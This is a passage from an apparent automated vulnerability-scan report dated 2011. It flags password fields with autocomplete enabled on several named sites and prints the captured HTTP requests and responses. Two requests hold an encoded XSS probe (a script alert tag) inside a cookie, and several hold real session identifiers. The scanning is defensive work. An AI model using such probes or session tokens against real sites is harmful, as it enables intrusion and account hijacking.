Host:   http://nanpa.org
Path:   /about_overview.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /about_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:19 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.8. http://nanpa.org/awards_overview.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /awards_overview.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /awards_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/education_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.9. http://nanpa.org/awards_overview.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /awards_overview.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /awards_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/education_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.10. http://nanpa.org/education_overview.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /education_overview.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /education_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/history.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:59 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.11. http://nanpa.org/education_overview.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /education_overview.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /education_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/history.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:59 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.12. http://nanpa.org/history.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /history.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /history.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/about_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 37882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.13. http://nanpa.org/history.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /history.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /history.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/about_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 37882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.14. https://support.connexon.com/sd/AddSolution.sd

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.connexon.com
Path:   /sd/AddSolution.sd

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /sd/AddSolution.sd?solID=37 HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: JSESSIONID=1CB498ABEDA80407FB8612A864D425DE; PREV_CONTEXT_PATH=; JSESSIONID=8E7ACD94D937E2DF6367A9E55BD677BE

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:56 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 6546


<link type="text/css" rel="stylesheet" href="/style/style.css?7607"/>
<link rel="SHORTCUT ICON" href="/images/favicon.ico"/>

<script>var isPortalEnabled = 'true';</script>
<link type="te
...[SNIP]...
<div id="PortalContRight" style="float:right;">
               
                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>    
                   
                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.15. https://support.connexon.com/sd/Request.sd

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.connexon.com
Path:   /sd/Request.sd

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /sd/Request.sd?mode=AddNew HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: JSESSIONID=1CB498ABEDA80407FB8612A864D425DE; PREV_CONTEXT_PATH=/sd; JSESSIONID=8E7ACD94D937E2DF6367A9E55BD677BE

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:57 GMT
Server: Apache-Coyote/1.1
Content-Length: 12530


<link type="text/css" rel="stylesheet" href="/style/style.css?7607"/>
<link rel="SHORTCUT ICON" href="/images/favicon.ico"/>

<script>var isPortalEnabled = 'true';</script>
<link type="tex
...[SNIP]...
<div id="PortalContRight" style="float:right;">
               
                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>    
                   
                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.16. https://support.connexon.com/sd/SolutionsHome.sd

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.connexon.com
Path:   /sd/SolutionsHome.sd

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /sd/SolutionsHome.sd HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.911enable.com/login/index.php

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 13742


<html>
<link type="text/css" rel="stylesheet" href="../style/style.css?aa">
<link type="text/css" rel="stylesheet" href="../style/demo.css">
<link rel="SHORTCUT ICON" hre
...[SNIP]...
<div id="PortalContRight" style="float:right;">
               
                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>    
                   
                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.17. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.sprint.com
Path:   /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 HTTP/1.1
Host: support.sprint.com
Proxy-Connection: keep-alive
Referer: http://shop2.sprint.com/en/support/faq/wlnp.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: Apache=173.193.214.243.1305161164637776; path=/
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 65521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">            <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">                                <fieldset>
...[SNIP]...
<br />                        <input type="password" name="PASSWORD" tabindex="2" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

14.18. http://www.911enable.com/login/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.911enable.com
Path:   /login/index.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login/index.php HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/business.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.4.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:06:54 GMT
Content-Length: 18966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<p style="width:445px;">
<form method="post" action="https://www.911enable.com/911form/login_process.php" enctype="multipart/form-data">
<table id="requestFormTable">
...[SNIP]...
<td><input type="password" name="pass" class="formText" style="width:130px;" /></td>
...[SNIP]...

14.19. https://www.nationalnanpa.com/nas/security/authUser.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/authUser.do

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /nas/security/authUser.do?function=verifySignIn HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: http://www.nationalnanpa.com/number_resource_info/area_code_maps.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596; BIGipServernas-ns=2869930176.20480.0000; __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; __utmc=82268809; __utmb=82268809.2.10.1305158784

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:31 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7557


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</script>


<form name="loginForm" method="post" action="/nas/security/logon.do?function=signon" onsubmit="return validate();"><input type="hidden" name="org.apache.struts.taglib.html.TOKEN" value="fc55bb28097906d9b23bc17edb76d94d">
...[SNIP]...
<td width="65%" valign="middle" align="left">
    <input type="password" name="password" maxlength="30" size="20" value="">
</td>
...[SNIP]...

14.20. https://www.nationalnanpa.com/nas/security/logon.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/logon.do

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /nas/security/logon.do;nanpaid=PbtxNLkWc1vbGTPPjJJ6vh7sQPWwtrp8yq10ytK0spRy8vN5RTQB!-242160596?function=signon HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:16:47 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7600


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<hr>

<form name="loginForm" method="post" action="/nas/security/logon.do?function=signon" onsubmit="return validate();">
<!-- we don't want it as struts cause we don't have a form associated yet. -->
...[SNIP]...
<td width="65%" valign="middle" align="left">
    <input type="password" name="password" maxlength="30" size="20" value="">
</td>
...[SNIP]...

14.21. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.22. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
